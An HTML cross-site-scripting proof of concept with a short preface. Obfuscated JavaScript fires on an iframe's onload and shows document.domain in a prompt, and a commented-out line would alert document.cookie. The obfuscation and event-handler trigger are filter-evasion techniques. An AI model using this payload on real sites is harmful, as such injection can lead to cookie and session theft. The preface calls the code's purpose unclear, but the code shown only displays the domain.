Script Execution on Iframe Load with Obfuscated Code.

This HTML document includes a title tag indicating that it was made by Taylor Christian Newsome. Within the head section, there’s a script containing a function named runScript. This function involves obfuscated JavaScript code using variable names like _0x3675bf, _0x5cf5, and _0x599c. The purpose of this script is not entirely clear due to the obfuscation. The script is designed to run when an iframe in the body section loads, and it invokes the runScript function. The iframe’s onload attribute is set to trigger the execution of the script within the runScript function. There’s also a commented-out script inside the iframe tag that, if uncommented, would attempt to execute an alert displaying the document’s cookies. The functionality and purpose of this script are somewhat obscured due to obfuscation, and caution should be exercised when dealing with obfuscated or unfamiliar code.

<html>
<title> Made By Taylor Christian Newsome </title>
<head>
    <script>
        function runScript() {
            var _0x3675bf = _0x5cf5;

            function _0x5cf5(_0xced4e9, _0x1ae724) {
                var _0x599cad = _0x599c();
                return _0x5cf5 = function (_0x5cf5d2, _0x6f919d) {
                    _0x5cf5d2 = _0x5cf5d2 - 0x94;
                    var _0x14caa7 = _0x599cad[_0x5cf5d2];
                    return _0x14caa7;
                }, _0x5cf5(_0xced4e9, _0x1ae724);
            }(function (_0x5ad362, _0x98a567) {
                var _0x459bc5 = _0x5cf5,
                    _0x454121 = _0x5ad362();
                while (!![]) {
                    try {
                        var _0x168170 = -parseInt(_0x459bc5(0x9e)) / 0x1 * (parseInt(_0x459bc5(0x95)) / 0x2) + parseInt(_0x459bc5(0x97)) / 0x3 * (-parseInt(_0x459bc5(0x9c)) / 0x4) + -parseInt(_0x459bc5(0x99)) / 0x5 + -parseInt(_0x459bc5(0x9f)) / 0x6 * (parseInt(_0x459bc5(0x9d)) / 0x7) + -parseInt(_0x459bc5(0x9b)) / 0x8 * (-parseInt(_0x459bc5(0x9a)) / 0x9) + -parseInt(_0x459bc5(0x94)) / 0xa + parseInt(_0x459bc5(0x98)) / 0xb * (parseInt(_0x459bc5(0x96)) / 0xc);
                        if (_0x168170 === _0x98a567) break;
                        else _0x454121['push'](_0x454121['shift']());
                    } catch (_0x5baa73) {
                        _0x454121['push'](_0x454121['shift']());
                    }
                }
            }(_0x599c, 0x28895), prompt(document[_0x3675bf(0xa0)]));

            function _0x599c() {
                var _0x34a15f = ['15170376Sgmhnu', '589203pPKatg', '11BaafMZ', '445905MAsUXq', '432bhVZQo', '14792bfmdlY', '4FKyEje', '92890jvCozd', '36031bizdfX', '114QrRNWp', 'domain', '3249220MUVofX', '18cpppdr'];
                _0x599c = function () {
                    return _0x34a15f;
                };
                return _0x599c();
            }
        }
    </script>
</head>
<body>
    <div>
        <iframe onload="runScript()">
            <!-- <script>onload=alert(%60document.cookie%60);</script> -->
        </iframe>
    </div>
</body>
</html>